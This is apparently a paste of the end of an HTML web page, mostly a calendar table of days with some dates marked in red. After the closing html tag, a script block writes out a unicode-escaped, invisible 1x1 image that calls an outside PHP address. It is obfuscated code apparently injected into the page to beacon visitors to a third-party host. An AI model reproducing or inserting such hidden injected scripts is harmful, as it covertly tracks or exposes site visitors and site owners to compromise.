  1098.           <TD class=calendar_day><font color="#FF0000">5 </font> </TD>
  1099.           <TD class=calendar_day><font color="#FF0000">6 </font> </TD>
  1100.           <TD class=calendar_day><font color="#FF0000">7 </font> </TD>
  1101.           <TD class=calendar_day><font color="#FF0000">8 </font> </TD></TR>
  1102.         <TR>
  1103.           <TD class=calendar_day>9 </TD>
  1104.           <TD class=calendar_day><font color="#FF0000">10 </font> </TD>
  1105.           <TD class=calendar_day><font color="#FF0000">11 </font> </TD>
  1106.           <TD class=calendar_day><font color="#FF0000">12 </font> </TD>
  1107.           <TD class=calendar_day>13</TD><TD class=calendar_day>14 </TD>
  1108.           <TD class=calendar_day>15 </TD></TR>
  1109.         <TR>
  1110.           <TD class=calendar_day><font color="#FF0000">16 </font> </TD>
  1111.           <TD class=calendar_day><font color="#FF0000">17 </font> </TD>
  1112.           <TD class=calendar_day><font color="#FF0000">18</font></TD><TD class=calendar_day>19</TD><TD class=calendar_day>20 </TD>
  1113.           <TD class=calendar_day>21 </TD>
  1114.           <TD class=calendar_current_day>22 </TD></TR>
  1115.         <TR>
  1116.           <TD class=calendar_day>23</TD><TD class=calendar_day>24</TD><TD class=calendar_day>25</TD><TD class=calendar_day>26</TD><TD class=calendar_day><font color="#FF0000">27</font></TD><TD class=calendar_day><font color="#FF0000">28</font></TD><TD class=calendar_day><font color="#FF0000">29</font></TD></TR><TR>
  1117.           <TD class=calendar_day>30</TD><TD class=calendar_day>31</TD><TD class=calendar_day></TD>
  1118.           <TD class=calendar_day></TD>
  1119.           <TD class=calendar_day></TD>
  1120.           <TD class=calendar_day></TD>
  1121.           <TD class=calendar_day></TD></TR></TBODY></TABLE></TD></TR>
  1122.   </TBODY></TABLE>
  1123.  
  1124.         </div>
  1125.  
  1126.  
  1127. </body></html>
  1128. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement